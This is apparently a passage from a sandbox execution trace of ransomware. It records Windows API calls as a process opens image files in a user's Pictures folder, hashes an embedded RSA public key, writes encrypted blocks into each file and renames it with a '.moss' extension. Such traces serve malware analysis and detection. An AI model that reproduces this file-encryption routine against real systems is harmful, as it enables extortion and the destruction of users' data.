(in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.993] GetLastError () returned 0x0 [0171.994] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.994] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.994] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.994] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.994] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.994] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.995] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x9413, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.995] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.995] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\54yB_qBDNM_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zyox_xdvwoqqjcuprl\\54yb_qbdnm_.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\54yB_qBDNM_.jpg.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zyox_xdvwoqqjcuprl\\54yb_qbdnm_.jpg.moss")) returned 1 [0171.997] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\kftTF.bmp") returned=".bmp" [0171.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\kftTF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zyox_xdvwoqqjcuprl\\kfttf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.997] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=24127) returned 1 [0171.997] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.001] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5e19, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.001] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.002] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.002] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x5e3f, lpOverlapped=0x0) returned 1 [0172.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.002] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.002] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0172.004] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.004] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.004] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.004] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.004] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.004] GetLastError () returned 0x0 [0172.004] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.004] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0172.004] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.004] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.004] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.004] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.005] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.005] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0172.005] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5e3f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.005] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.006] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\kftTF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zyox_xdvwoqqjcuprl\\kfttf.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\kftTF.bmp.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zyox_xdvwoqqjcuprl\\kfttf.bmp.moss")) returned 1 [0172.008] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\w3pbGdHFqm6D3yqYrHj.bmp") returned=".bmp" [0172.008] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\w3pbGdHFqm6D3yqYrHj.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zyox_xdvwoqqjcuprl\\w3pbgdhfqm6d3yqyrhj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.008] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=16137) returned 1 [0172.008] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.012] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3ee3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.013] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.014] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x3f09, lpOverlapped=0x0) returned 1 [0172.014] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.014] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.014] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.014] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0172.016] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.016] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.016] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.016] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.016] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.016] GetLastError () returned 0x0 [0172.016] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.016] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0172.016] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.016] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.016] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.017] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.017] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.017] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0172.017] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3f09, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.017] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.018] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\w3pbGdHFqm6D3yqYrHj.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zyox_xdvwoqqjcuprl\\w3pbgdhfqm6d3yqyrhj.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\w3pbGdHFqm6D3yqYrHj.bmp.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zyox_xdvwoqqjcuprl\\w3pbgdhfqm6d3yqyrhj.bmp.moss")) returned 1 [0172.020] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.021] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0172.021] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.024] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, 